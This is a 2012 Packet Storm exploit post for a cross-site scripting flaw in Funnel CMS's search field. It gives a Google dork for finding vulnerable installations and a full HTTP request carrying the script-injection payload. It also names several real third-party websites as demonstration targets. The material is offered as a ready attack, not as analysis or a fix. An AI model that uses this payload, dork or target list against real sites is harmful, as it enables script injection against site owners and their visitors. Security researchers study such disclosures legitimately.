Funnel CMS Cross Site Scripting

2012-08-25T00:00:00
ID PACKETSTORM:115895
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
                                            `###################################################################################  
  
# Exploit Title: FUNNEL CMS Cross Site Scripting Vulnerability  
#  
# Google Dork:inurl:Default.asp?id=18&l=1  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Vendor Home : http://www.funnelcms.com/Default.asp?id=6&l=1  
#  
# Tested on: all  
#  
###################################################################################  
  
  
========================================  
Http Headers / Host: www.kensington-market.ca  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101   
Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Referer: http://www.kensington-market.ca/Default.asp?id=26&l=1  
Cookie: ASPSESSIONIDQARDSCAQ=OJFBGOPDCHFMBJEKDFONFAGI;   
ASPSESSIONIDSATASDAR=AAMFLBCAGNAFIIIMDOEBCNPN  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 23  
POST DATA-------------------------------------------  
cms_search_query="><script>alert(0);</script>  
  
D3M0 :   
http://www.funnelcms.com/Default.asp?id=18&l=1  
http://www.gwndragonboat.com/Default.asp?id=18&l=1  
http://www.thesolutionstudio.com/Default.asp?id=9&l=1  
http://www.kensington-market.ca/Default.asp?id=26&l=1  
  
===============Crim3R@Att.Net===========  
  
$home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir  
`